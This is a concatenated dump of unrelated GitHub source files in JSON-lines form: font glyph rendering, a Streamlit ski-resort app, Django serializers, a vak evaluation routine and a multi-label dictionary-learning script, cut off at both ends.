self.w, 1) )\n stencil = np.repeat(stencil,3,axis=2)\n stencil_neg = 1.0 - stencil\n result = stencil * fcolor\n result += stencil_neg * bcolor\n d2[ hi * self.h: (hi+1) * self.h, wi * self.w : (wi+1) * self.w ] = result\n\n if img0 is not None:\n diff = result - img0[ hi * self.h: (hi+1) * self.h, wi * self.w : (wi+1) * self.w ]\n diff = np.abs(diff)\n diff = float(np.sum(diff))\n diffImg[hi,wi] = diff\n if img0 is not None:\n return d2, diffImg\n return d2\n\n def static_table(self):\n self.decoding_table = [u\"\\u0000\",\nu\"\\u263A\",\nu\"\\u263B\",\nu\"\\u2665\",\nu\"\\u2666\",\nu\"\\u2663\",\nu\"\\u2660\",\nu\"\\u2022\",\nu\"\\u25D8\",\nu\"\\u25CB\",\nu\"\\u25D9\",\nu\"\\u2642\",\nu\"\\u2640\",\nu\"\\u266A\",\nu\"\\u266B\",\nu\"\\u263C\",\nu\"\\u25BA\",\nu\"\\u25C4\",\nu\"\\u2195\",\nu\"\\u203C\",\nu\"\\u00B6\",\nu\"\\u00A7\",\nu\"\\u25AC\",\nu\"\\u21A8\",\nu\"\\u2191\",\nu\"\\u2193\",\nu\"\\u2192\",\nu\"\\u2190\",\nu\"\\u221F\",\nu\"\\u2194\",\nu\"\\u25B2\",\nu\"\\u25BC\",\nu\"\\u0020\",\nu\"\\u0021\",\nu\"\\u0022\",\nu\"\\u0023\",\nu\"\\u0024\",\nu\"\\u0025\",\nu\"\\u0026\",\nu\"\\u0027\",\nu\"\\u0028\",\nu\"\\u0029\",\nu\"\\u002A\",\nu\"\\u002B\",\nu\"\\u002C\",\nu\"\\u002D\",\nu\"\\u002E\",\nu\"\\u002F\",\nu\"\\u0030\",\nu\"\\u0031\",\nu\"\\u0032\",\nu\"\\u0033\",\nu\"\\u0034\",\nu\"\\u0035\",\nu\"\\u0036\",\nu\"\\u0037\",\nu\"\\u0038\",\nu\"\\u0039\",\nu\"\\u003A\",\nu\"\\u003B\",\nu\"\\u003C\",\nu\"\\u003D\",\nu\"\\u003E\",\nu\"\\u003F\",\nu\"\\u0040\",\nu\"\\u0041\",\nu\"\\u0042\",\nu\"\\u0043\",\nu\"\\u0044\",\nu\"\\u0045\",\nu\"\\u0046\",\nu\"\\u0047\",\nu\"\\u0048\",\nu\"\\u0049\",\nu\"\\u004A\",\nu\"\\u004B\",\nu\"\\u004C\",\nu\"\\u004D\",\nu\"\\u004E\",\nu\"\\u004F\",\nu\"\\u0050\",\nu\"\\u0051\",\nu\"\\u0052\",\nu\"\\u0053\",\nu\"\\u0054\",\nu\"\\u0055\",\nu\"\\u0056\",\nu\"\\u0057\",\nu\"\\u0058\",\nu\"\\u0059\",\nu\"\\u005A\",\nu\"\\u005B\",\nu\"\\u005C\",\nu\"\\u005D\",\nu\"\\u005E\",\nu\"\\u005F\",\nu\"\\u0060\",\nu\"\\u0061\",\nu\"\\u0062\",\nu\"\\u0063\",\nu\"\\u0064\",\nu\"\\u0065\",\nu\"\\u0066\",\nu\"\\u0067\",\nu\"\\u0068\",\nu\"\\u0069\",\nu\"\\u006A\",\nu\"\\u006B\",\nu\"\\u006C\",\nu\"\\u006D\",\nu\"\\u006E\",\nu\"\\u006F\",\nu\"\\u0070\",\nu\"\\u0071\",\nu\"\\u0072\",\nu\"\\u0073\",\nu\"\\u0074\",\nu\"\\u0075\",\nu\"\\u0076\",\nu\"\\u0077\",\nu\"\\u0078\",\nu\"\\u0079\",\nu\"\\u007A\",\nu\"\\u007B\",\nu\"\\u007C\",\nu\"\\u007D\",\nu\"\\u007E\",\nu\"\\u2302\",\nu\"\\u00C7\",\nu\"\\u00FC\",\nu\"\\u00E9\",\nu\"\\u00E2\",\nu\"\\u00E4\",\nu\"\\u00E0\",\nu\"\\u00E5\",\nu\"\\u00E7\",\nu\"\\u00EA\",\nu\"\\u00EB\",\nu\"\\u00E8\",\nu\"\\u00EF\",\nu\"\\u00EE\",\nu\"\\u00EC\",\nu\"\\u00C4\",\nu\"\\u00C5\",\nu\"\\u00C9\",\nu\"\\u00E6\",\nu\"\\u00C6\",\nu\"\\u00F4\",\nu\"\\u00F6\",\nu\"\\u00F2\",\nu\"\\u00FB\",\nu\"\\u00F9\",\nu\"\\u00FF\",\nu\"\\u00D6\",\nu\"\\u00DC\",\nu\"\\u00A2\",\nu\"\\u00A3\",\nu\"\\u00A5\",\nu\"\\u20A7\",\nu\"\\u0192\",\nu\"\\u00E1\",\nu\"\\u00ED\",\nu\"\\u00F3\",\nu\"\\u00FA\",\nu\"\\u00F1\",\nu\"\\u00D1\",\nu\"\\u00AA\",\nu\"\\u00BA\",\nu\"\\u00BF\",\nu\"\\u2310\",\nu\"\\u00AC\",\nu\"\\u00BD\",\nu\"\\u00BC\",\nu\"\\u00A1\",\nu\"\\u00AB\",\nu\"\\u00BB\",\nu\"\\u2591\",\nu\"\\u2592\",\nu\"\\u2593\",\nu\"\\u2502\",\nu\"\\u2524\",\nu\"\\u2561\",\nu\"\\u2562\",\nu\"\\u2556\",\nu\"\\u2555\",\nu\"\\u2563\",\nu\"\\u2551\",\nu\"\\u2557\",\nu\"\\u255D\",\nu\"\\u255C\",\nu\"\\u255B\",\nu\"\\u2510\",\nu\"\\u2514\",\nu\"\\u2534\",\nu\"\\u252C\",\nu\"\\u251C\",\nu\"\\u2500\",\nu\"\\u253C\",\nu\"\\u255E\",\nu\"\\u255F\",\nu\"\\u255A\",\nu\"\\u2554\",\nu\"\\u2569\",\nu\"\\u2566\",\nu\"\\u2560\",\nu\"\\u2550\",\nu\"\\u256C\",\nu\"\\u2567\",\nu\"\\u2568\",\nu\"\\u2564\",\nu\"\\u2565\",\nu\"\\u2559\",\nu\"\\u2558\",\nu\"\\u2552\",\nu\"\\u2553\",\nu\"\\u256B\",\nu\"\\u256A\",\nu\"\\u2518\",\nu\"\\u250C\",\nu\"\\u2588\",\nu\"\\u2584\",\nu\"\\u258C\",\nu\"\\u2590\",\nu\"\\u2580\",\nu\"\\u03B1\",\nu\"\\u00DF\",\nu\"\\u0393\",\nu\"\\u03C0\",\nu\"\\u03A3\",\nu\"\\u03C3\",\nu\"\\u00B5\",\nu\"\\u03C4\",\nu\"\\u03A6\",\nu\"\\u0398\",\nu\"\\u03A9\",\nu\"\\u03B4\",\nu\"\\u221E\",\nu\"\\u03C6\",\nu\"\\u03B5\",\nu\"\\u2229\",\nu\"\\u2261\",\nu\"\\u00B1\",\nu\"\\u2265\",\nu\"\\u2264\",\nu\"\\u2320\",\nu\"\\u2321\",\nu\"\\u00F7\",\nu\"\\u2248\",\nu\"\\u00B0\",\nu\"\\u2219\",\nu\"\\u00B7\",\nu\"\\u221A\",\nu\"\\u207F\",\nu\"\\u00B2\",\nu\"\\u25A0\",\nu\"\\u00A0\"]\n self.decoding_table_rmap = { k:v for v,k in enumerate(self.decoding_table) }\n\n def findC(self, ascii_c:int, color = [255,255,255], bcolor = [0,0,0]): # notice default arg mutable\n raise Exception(\"should be implemented as return np.array of (h,w,c)\")\n\nclass TTFFont(FontBase):\n def __init__(self, font_size):\n self.font_size = font_size\n self.scale = 2\n self.h = font_size\n self.w = font_size // 2\n ttf_font = 'terminus-ttf-4.47.0/TerminusTTF-4.47.0.ttf'\n bdf_font = \"terminus-font-4.48/ter-u12n.bdf\"\n #self.fnt = ImageFont.truetype(ttf_font, font_size * self.scale)\n self.fnt = ImageFont.truetype(\"courbd.ttf\", font_size * self.scale)\n\n self.static_table()\n self.genAllChar()\n\n\n\n # while character\n def genChar(self, c):\n # 'L' mode grey color\n txt = Image.new('L', (self.font_size*self.scale // 2, self.font_size*self.scale), 0)\n d = ImageDraw.Draw(txt)\n d.text((0,0), c, font=self.fnt, fill=255)\n txt = txt.resize( (self.font_size // 2, self.font_size ),Image.NEAREST )\n #txt.save(f\"x_{self.decoding_table_rmap[c]}.bmp\")\n return normalize_0_1(np.array(txt, dtype=np.float)), txt\n\nclass BitmapFont(FontBase):\n def __init__(self, font_size):\n self.font_size = font_size\n if font_size == 12:\n bdf_font = \"terminus-font-4.48/ter-u12n.bdf\"\n elif font_size == 18:\n bdf_font = \"terminus-font-4.48/ter-u18n.bdf\"\n else:\n raise Exception(f\"do not support front size {font_size}\")\n\n self.h = font_size\n self.w = font_size // 2 # NOTICE fixed\n self.empty_set = set()\n\n with open(bdf_font,'rb') as f:\n self.fnt = BdfFontFile(f)\n\n self.static_table()\n self.genAllChar()\n\n # while character\n def genChar(self, c):\n ascii_idx = self.decoding_table_rmap[c]\n if self.fnt.glyph[ascii_idx] is None:\n self.empty_set.add(ascii_idx)\n return self.genChar(' ')\n id,_,_,_,im = self.fnt.glyph[ascii_idx]\n return normalize_0_1(1*np.array(im, dtype=np.float)), im\n\nclass CombinedBitmapFont(BitmapFont):\n def __init__(self, font_size):\n self._f = TTFFont(font_size)\n\n self.chBelong = [-1] * 256\n super().__init__(font_size)\n print(\"done\")\n\n # while character\n def genChar(self, c):\n idx = self.decoding_table_rmap[c]\n ascii_idx = self.decoding_table_rmap[c]\n if self.fnt.glyph[ascii_idx] is None:\n self.empty_set.add(ascii_idx)\n self.chBelong[ ascii_idx ] = 0\n return self._f.genChar(c)\n id,_,_,_,im = self.fnt.glyph[ascii_idx]\n if idx >= 128:\n self.chBelong[ascii_idx] = 0\n return self._f.genChar(c)\n self.chBelong[ascii_idx] = 1\n #im.save(f\"x_{self.decoding_table_rmap[c]}.bmp\")\n t = normalize_0_1(1*np.array(im, dtype=np.float))\n if self.font_size == 18:\n # it is 18 x 10 size, remove the last column\n t = t[:,:-1]\n return t, im\n\n\n\n\nclass PictureFont(FontBase):\n \"\"\"\n Load \"font\" from a image\n \"\"\"\n def __init__(self, font_size = 12):\n if font_size == 12:\n self.path = \"cp437_12x12.png\"\n if font_size == 18:\n self.path = \"cp437_18x18.png\"\n self.fullimg = Image.open(self.path)\n fw, fh = self.fullimg.size\n # assume 16 x 16 blocks\n self.w = fw // 16\n self.h = fh // 16\n assert self.h == self.w\n self.font_size = self.h\n self.static_table()\n self.convertImage()\n self.patch()\n\n def convertImage(self):\n imgArr = np.array(self.fullimg)\n # (h1, h2, w1, w2, c)\n imgArr = imgArr.reshape( (16, self.h, 16, self.w, 3) )\n self.chnp = []\n self.chimg = []\n for i in range(16):\n for j in range(16):\n smallarr = imgArr[ i,:,j,:,:]\n smallImg = Image.fromarray(smallarr)\n smallarr2 = smallarr.sum(axis = -1)\n smallarr2 = normalize_0_1(smallarr2)\n self.chnp += [ smallarr2 ]\n self.chimg += [smallImg]\n #smallImg.save(f\"x_{i*16 + j}.bmp\")\n\n def genAllChar(self):\n pass\n\n # while character\n def genChar(self, c):\n idx = self.decoding_table_rmap[c]\n return self.chnp[idx], self.chimg[idx]\n\n def patch(self):\n sharp12 = np.array([[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 0., 0.,],\n [0., 0., 0., 0., 1., 0., 0., 1., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,],\n [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,]] )\n idx = self.decoding_table_rmap['#']\n if self.path == \"cp437_12x12.png\":\n self.chnp[idx] = sharp12\n # TODO change self.chimg as well","repo_name":"oneengineer/cogai","sub_path":"fonts.py","file_name":"fonts.py","file_ext":"py","file_size_in_byte":12802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15975503385","text":"#!/usr/bin/python3\n\n\ndef print_matrix_integer(matrix=[[]]):\n\n for row in matrix:\n j = 0\n for column in row:\n lon = len(row)\n j += 1\n print(\"{:d}\".format(column), end=\"\")\n if j != lon:\n print(\" \", end=\"\")\n print(\"\")\n","repo_name":"Caroll1889/holbertonschool-higher_level_programming","sub_path":"0x03-python-data_structures/6-print_matrix_integer.py","file_name":"6-print_matrix_integer.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34183892717","text":"import urllib2\n\nfrom localsettings import TEST_URL\n\nresponse = urllib2.urlopen(TEST_URL)\ndata = response.read()\n\n# Write data to file\nfilename = 'data.csv'\nfile_ = open(filename, 'w')\nfile_.write(data)\nfile_.close()\n","repo_name":"mgeraci/trackmytour-rss","sub_path":"download-data.py","file_name":"download-data.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41013557925","text":"import streamlit as st\nimport pandas as pd\nfrom src.cargar_datos import *\nfrom src.streamlit import *\nfrom data import *\nfrom streamlit_folium import folium_static\n\nst.write('''\n# Skiing:\n# Escoge tu estacion:\n''')\ndata = cargardatos()\nrestdata = cargarrestaurantes()\nestaciones = data['estacion']\n#map = pd.read_json('data/kepler.gl.json')\n\ninput_nivel = ['elige','novato','principiante', 'medio', 'experto']\nnivel = st.selectbox('Cual es tu nivel de skii: ', input_nivel)\nif nivel == 'elige':\n st.stop()\n \ninput_snow = ['elige', 'S', 'N', 'indiferente']\nsnow = st.radio('¿Quieres que haya Snonwpark? ', input_snow)\nif snow == 'elige':\n st.stop()\n\n\ninput_fam = ['elige', 'S', 'N']\nfam = st.radio('Vas con tu familia: ', input_fam)\nif fam == 'elige':\n st.stop()\n\n\nrespuesta = convinetor(nivel,snow,fam)\n#print(respuesta)\n#mapita(respuesta)\nfolium_static(mapita(respuesta))\nrespuesta\n#detalles = mostrar(respuesta)\n#detalles","repo_name":"Afidalgo-fmm/Sking-across-Spain","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73451878026","text":"import requests\nimport json\n\nclass Dandelion:\n\n # in production, credential would be maintained within the \n # configuration and certainly not in the source code!\n # this is a free test account so not too worried about it :)\n TOKEN = \"2c0edee96e414d7e8fa468a38f688a2e\"\n URL = \"https://api.dandelion.eu/datatxt/nex/v1\"\n\n # these are pretty arbitrary, just played around a bit\n NUM_ENTITIES = 3\n MIN_CONFIDENCE = 0.7\n\n # dandelion API limits text length\n CHAR_LIMIT = 3000\n\n def getEntities(self, text):\n keywords = set()\n min_index = 0\n max_index = self.CHAR_LIMIT if len(text) > self.CHAR_LIMIT else len(text)\n while max_index <= len(text):\n short_text = text[min_index:max_index]\n params = {\n 'token': self.TOKEN,\n 'text': short_text,\n 'top_entities': self.NUM_ENTITIES,\n 'min_confidence': self.MIN_CONFIDENCE\n }\n response = requests.get(self.URL, params=params)\n for annotation in response.json()['topEntities']:\n keywords.add(annotation['uri'])\n\n min_index = max_index\n if (max_index == len(text)):\n break\n max_index = max_index + self.CHAR_LIMIT if max_index + self.CHAR_LIMIT <= len(text) else len(text)\n return keywords\n","repo_name":"loetting/regtest","sub_path":"RegulationNLP/Dandelion.py","file_name":"Dandelion.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11212000106","text":"from collections import OrderedDict\nfrom datetime import datetime\nimport json\n\nimport joblib\nimport pandas as pd\nimport torch.utils.data\n\nfrom .. import models\nfrom .. import transforms\nfrom ..datasets.vocal_dataset import VocalDataset\nfrom ..logging import log_or_print\n\n\ndef eval(csv_path,\n model_config_map,\n checkpoint_path,\n labelmap_path,\n output_dir,\n window_size,\n num_workers,\n split='test',\n spect_scaler_path=None,\n spect_key='s',\n timebins_key='t',\n device=None,\n logger=None):\n \"\"\"evaluate a trained model\n\n Parameters\n ----------\n csv_path : str, pathlib.Path\n path to where dataset was saved as a csv.\n model_config_map : dict\n where each key-value pair is model name : dict of config parameters\n checkpoint_path : str, pathlib.Path\n path to directory with checkpoint files saved by Torch, to reload model\n output_dir : str, pathlib.Path\n Path to location where .csv files with evaluation metrics should be saved.\n window_size : int\n size of windows taken from spectrograms, in number of time bins,\n shown to neural networks\n labelmap_path : str, pathlib.Path\n path to 'labelmap.json' file.\n models : list\n of model names. e.g., 'models = TweetyNet, GRUNet, ConvNet'\n batch_size : int\n number of samples per batch presented to models during training.\n num_workers : int\n Number of processes to use for parallel loading of data.\n Argument to torch.DataLoader. Default is 2.\n split : str\n split of dataset on which model should be evaluated.\n One of {'train', 'val', 'test'}. Default is 'test'.\n spect_scaler_path : str, pathlib.Path\n path to a saved SpectScaler object used to normalize spectrograms.\n If spectrograms were normalized and this is not provided, will give\n incorrect results.\n Default is None.\n spect_key : str\n key for accessing spectrogram in files. Default is 's'.\n timebins_key : str\n key for accessing vector of time bins in files. Default is 't'.\n device : str\n Device on which to work with model + data.\n Defaults to 'cuda' if torch.cuda.is_available is True.\n\n Other Parameters\n ----------------\n logger : logging.Logger\n instance created by vak.logging.get_logger. Default is None.\n\n Returns\n -------\n None\n \"\"\"\n # ---- get time for .csv file --------------------------------------------------------------------------\n timenow = datetime.now().strftime('%y%m%d_%H%M%S')\n\n # ---------------- load data for evaluation ------------------------------------------------------------------------\n if spect_scaler_path:\n log_or_print(\n f'loading spect scaler from path: {spect_scaler_path}',\n logger=logger, level='info'\n )\n spect_standardizer = joblib.load(spect_scaler_path)\n else:\n log_or_print(\n f'not using a spect scaler',\n logger=logger, level='info',\n )\n spect_standardizer = None\n\n logger.info(\n f'loading labelmap from path: {spect_scaler_path}'\n )\n with labelmap_path.open('r') as f:\n labelmap = json.load(f)\n\n item_transform = transforms.get_defaults('eval',\n spect_standardizer,\n window_size=window_size,\n return_padding_mask=True,\n )\n log_or_print(\n f'creating dataset for evaluation from: {csv_path}',\n logger=logger, level='info',\n )\n val_dataset = VocalDataset.from_csv(csv_path=csv_path,\n split=split,\n labelmap=labelmap,\n spect_key=spect_key,\n timebins_key=timebins_key,\n item_transform=item_transform,\n )\n val_data = torch.utils.data.DataLoader(dataset=val_dataset,\n shuffle=False,\n # batch size 1 because each spectrogram reshaped into a batch of windows\n batch_size=1,\n num_workers=num_workers)\n\n # ---------------- do the actual evaluating ------------------------------------------------------------------------\n input_shape = val_dataset.shape\n # if dataset returns spectrogram reshaped into windows,\n # throw out the window dimension; just want to tell network (channels, height, width) shape\n if len(input_shape) == 4:\n input_shape = input_shape[1:]\n\n models_map = models.from_model_config_map(\n model_config_map,\n num_classes=len(labelmap),\n input_shape=input_shape\n )\n\n for model_name, model in models_map.items():\n logger.info(\n f'running evaluation for model: {model_name}'\n )\n model.load(checkpoint_path)\n metric_vals = model.evaluate(eval_data=val_data,\n device=device)\n # create a \"DataFrame\" with just one row which we will save as a csv;\n # the idea is to be able to concatenate csvs from multiple runs of eval\n row = OrderedDict(\n [\n ('model_name', model_name),\n ('checkpoint_path', checkpoint_path),\n ('labelmap_path', labelmap_path),\n ('spect_scaler_path', spect_scaler_path),\n ('csv_path', csv_path),\n ]\n )\n # order metrics by name to be extra sure they will be consistent across runs\n row.update(\n sorted([(k, v) for k, v in metric_vals.items() if k.startswith('avg_')])\n )\n\n # pass index into dataframe, needed when using all scalar values (a single row)\n # throw away index below when saving to avoid extra column\n eval_df = pd.DataFrame(row, index=[0])\n eval_csv_path = output_dir.joinpath(\n f'eval_{model_name}_{timenow}.csv'\n )\n logger.info(\n f'saving csv with evaluation metrics at: {eval_csv_path}'\n )\n eval_df.to_csv(eval_csv_path, index=False) # index is False to avoid having \"Unnamed: 0\" column when loading\n","repo_name":"Tubbz-alt/vak","sub_path":"src/vak/core/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"29204387985","text":"from rest_framework import serializers\nfrom .models import Brand, Products, Category, Color, Gender, Size, Status, Subcategory, Update, Messages, UserAlem\nfrom .models import Orders, Favorites\n\n\nclass BrandSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Brand\n fields = ('url', 'name', 'products', )\n\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = Products\n fields = ('name', 'description', 'photo', 'brand', 'category', 'color', 'gender', 'size', 'status',\n 'subcategory', 'update',)\n\n\n\nclass CategorySerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Category\n fields = ('url', 'pk', 'ai', 'name', 'products', 'photo')\n\nclass ColorSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Color\n fields = ('url', 'name', 'products', )\n\nclass GenderSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Gender\n fields = ('url', 'name', 'products', )\n\nclass SizeSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Size\n fields = ('url', 'name', 'subcategory','products', )\n\nclass StatusSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Status\n fields = ('url', 'name', 'products', )\n\nclass SubcategorySerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Subcategory\n fields = ('url', 'name', 'category', 'products', )\n\nclass UpdateSerializer(serializers.HyperlinkedModelSerializer):\n products = serializers.HyperlinkedRelatedField(\n many=True,\n read_only=True,\n view_name='product-detail')\n\n class Meta:\n model = Update\n fields = ('url', 'update', 'products')\n\nclass MessageSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(queryset=UserAlem.objects.all(), slug_field='username')\n #user = serializers.HyperlinkedRelatedField(\n #many=True,\n #read_only=True,\n #view_name='messages-detail')\n\n class Meta:\n model = Messages\n fields = ('url', 'user', 'text', 'date')\n\nclass OrdersSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(queryset=UserAlem.objects.all(), slug_field='username')\n\n class Meta:\n model = Orders\n fields = ('url', 'user', 'ai', 'color', 'completed', 'date', 'name', 'quantity', 'size')\n\nclass FavoritesSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(queryset=UserAlem.objects.all(), slug_field='username')\n\n class Meta:\n model = Favorites\n fields = ('url', 'user', 'ai', 'color', 'date', 'name', 'size')\n\nclass UserAlemSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = UserAlem\n fields = ('url', 'username', 'phone', 'email')","repo_name":"ilviirgroup/alemAdminDjango","sub_path":"alemsite/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37234995631","text":"#two layer dictionary learning: ADMM-MLDLSI 0.7864269788182834\n\nimport scipy.io\nimport time\nimport pdb\nimport numpy as np\nfrom SSDL_GU import *\nfrom LocalClassifier import *\nfrom DictUpdate import *\nfrom MLDLSI2_MUL import *\nfrom learning_incoherent_dictionary import *\nfrom sklearn.decomposition import SparseCoder\nfrom numpy.linalg import norm\nfrom numpy import linalg as LA\nimport sys\nfrom sklearn import preprocessing\nfrom sklearn.neighbors import NearestNeighbors\nfrom mnist import MNIST\nfrom PIL import Image\nimport math\nimport os\nimport cv2\nimport random\nfrom numpy.matlib import repmat\nimport copy\nimport scipy.io as scio\nfrom li2nsvm_multiclass_lbfgs import *\n\ndef DefaultModelParams():\n params=Params()\n params.reg_mode = 2;\n params.the_lambda = 0.01;\n params.theta = 30.0;\n params.kappa = 2.5;\n params.beta = 0.05;\n params.reg_type = 'l1';\n params.lambda_min = 10;\n params.lambda_max = 150;\n params.lla_iter = 5;\n params.L = 0;\n params.positive = False;\n params.project = False;\n params.l2err = (8**2)*(1.15**2)*((1/255)**2);\n return params\n\nMAX_Average_Precision=0.0\n\nwhile True:\n\n atom_n=300\n transform_n_nonzero_coefs_1=30\n atom_n_2=30\n transform_n_nonzero_coefs_2=30\n data = scipy.io.loadmat('T4.mat') # 读取mat文件\n D_init = scipy.io.loadmat('D_init.mat')['D0_reg'][0] # 读取mat文件\n train_data=data['train_data']\n train_data_reg=preprocessing.normalize(train_data.T, norm='l2').T\n train_Annotation=data['train_Annotation']\n train_Annotation=train_Annotation.astype(int)\n test_data=data['test_data']\n test_data_reg=preprocessing.normalize(test_data.T, norm='l2').T\n test_Annotation=data['test_Annotation']\n test_Annotation=test_Annotation.astype(int)\n testNum=test_data.shape[1]\n labelNum=test_Annotation.shape[0]\n featureDim=test_data.shape[0]\n atomNum=[atom_n,atom_n,atom_n,atom_n,atom_n]\n one_label_data=np.empty(5,dtype=object)\n one_label_data_all=np.zeros((train_data_reg.shape[0],0))\n for i in range(labelNum):\n one_label_data[i]=train_data_reg[:,np.where(train_Annotation[i]==1)[0]]\n one_label_data_all=np.hstack((one_label_data_all,one_label_data[i]))\n y = np.zeros(one_label_data_all.shape[1],dtype=int)\n start=0\n for i in range(labelNum):\n end=start+one_label_data[i].shape[1]\n y[start:end]=i\n start=end\n lagrangian_multiplier=np.zeros(one_label_data_all.shape)\n beta=6\n delta=1e-6\n gamma=np.random.rand(1)[0]\n gamma=0.5\n D_first_layer=np.random.randn(train_data.shape[0], atom_n)\n D_first_layer=preprocessing.normalize(D_first_layer.T, norm='l2').T\n G=np.empty(one_label_data_all.shape)\n H=np.empty(one_label_data_all.shape)\n Y_pre=np.zeros((labelNum,y.shape[0]),dtype=int)\n for i in range(y.shape[0]):\n Y_pre[y[i],i]=1\n W=np.random.randn(labelNum,atom_n)\n W=preprocessing.normalize(W.T, norm='l2').T\n G_W=np.empty(Y_pre.shape)\n H_W=np.empty(Y_pre.shape)\n lagrangian_multiplier_W=np.zeros(Y_pre.shape)\n\n params = Params()\n params.model = DefaultModelParams()\n params.model.lambda2 = 0.003\n params.model.lambda1 = 0.04\n params.mu0 = 0.0\n params.xmu0 = 0.05\n params.mu_mode = [-1]\n params.positive = False\n params.min_change = 1e-5\n params.batch_size = 0\n params.test_size = 0\n params.resume = False\n params.do_control_class = False\n params.xval_step = 10\n params.remember_factor = 0.4\n params.output_dir = 'results/dict'\n params.training_data = train_data_reg\n params.testing_data = []\n params.training_labels = train_Annotation\n params.testing_labels = []\n params.update_method = 'pg'\n params.debug = 0\n params.base_name = 'global'\n params.discard_unused_atoms = 0.005\n params.discard_constant_patches = 0.001\n params.dict_update = DictUpdate()\n params.dict_update.xcorr = 1\n params.max_iter=1000\n for l in range(5):\n print(l)\n coder = SparseCoder(dictionary=D_first_layer.T, transform_n_nonzero_coefs=transform_n_nonzero_coefs_1,\n transform_algorithm=\"omp\")\n X_train = (coder.transform(one_label_data_all.T)).T\n G= (beta * D_first_layer @ X_train + 2 * one_label_data_all - lagrangian_multiplier) / (2 + beta)\n H= G + lagrangian_multiplier / beta - D_first_layer @ X_train\n for i in range(D_first_layer.shape[1]):\n Omega=X_train[i]@X_train[i]\n D_first_layer[:, i]= D_first_layer[:, i] + (H @ X_train[i]) / (Omega + delta)\n D_first_layer=preprocessing.normalize(D_first_layer.T, norm='l2').T\n lagrangian_multiplier=lagrangian_multiplier+gamma*beta*(G - D_first_layer @ X_train)\n\n G_W=(beta*W@X_train+2*Y_pre-lagrangian_multiplier_W)/(2+beta)\n H_W=G_W+lagrangian_multiplier_W/beta-W@X_train\n for i in range(D_first_layer.shape[1]):\n Omega=X_train[i]@X_train[i]\n W[:,i]=W[:,i]+(H_W@X_train[i])/(Omega+delta)\n W=preprocessing.normalize(W.T, norm='l2').T\n lagrangian_multiplier_W=lagrangian_multiplier_W+gamma*beta*(G_W-W@X_train)\n pass\n\n train_func2=None\n A_mean=None\n Dusage=None\n Uk=None\n bk=None\n D_sec_layer=None\n\n coder = SparseCoder(dictionary=D_first_layer.T, transform_n_nonzero_coefs=transform_n_nonzero_coefs_1,\n transform_algorithm=\"omp\")\n X_test = (coder.transform(test_data_reg.T)).T\n # diff = np.sum(abs(test_data_reg - D @ X_test))\n # print(diff)\n # output=W@X_test\n # Average_Precision,Average_Precision1=Average_precision(output,test_Annotation)\n # print(Average_Precision)\n coder = SparseCoder(dictionary=D_first_layer.T, transform_n_nonzero_coefs=transform_n_nonzero_coefs_1,\n transform_algorithm=\"omp\")\n X_train_first_layer = (coder.transform(one_label_data_all.T)).T\n params.training_data=X_train_first_layer\n #这里是随机初始化字典\n D0_reg_layer2 = np.random.rand(labelNum, X_train_first_layer.shape[0], atom_n_2)\n params.D0=copy.deepcopy(D0_reg_layer2)\n # 现在随机初始化字典可以跑起来了 接下来用A1_sum来初始化字典\n # for i in range(labelNum):\n # Y_index_layer_2 = np.where(y == i)[0]\n # # random.shuffle(Y_index_layer_2)\n # D0_reg_layer2[i] = X_train_first_layer[:, Y_index_layer_2][:, :atom_n_2]\n # params.D0 = 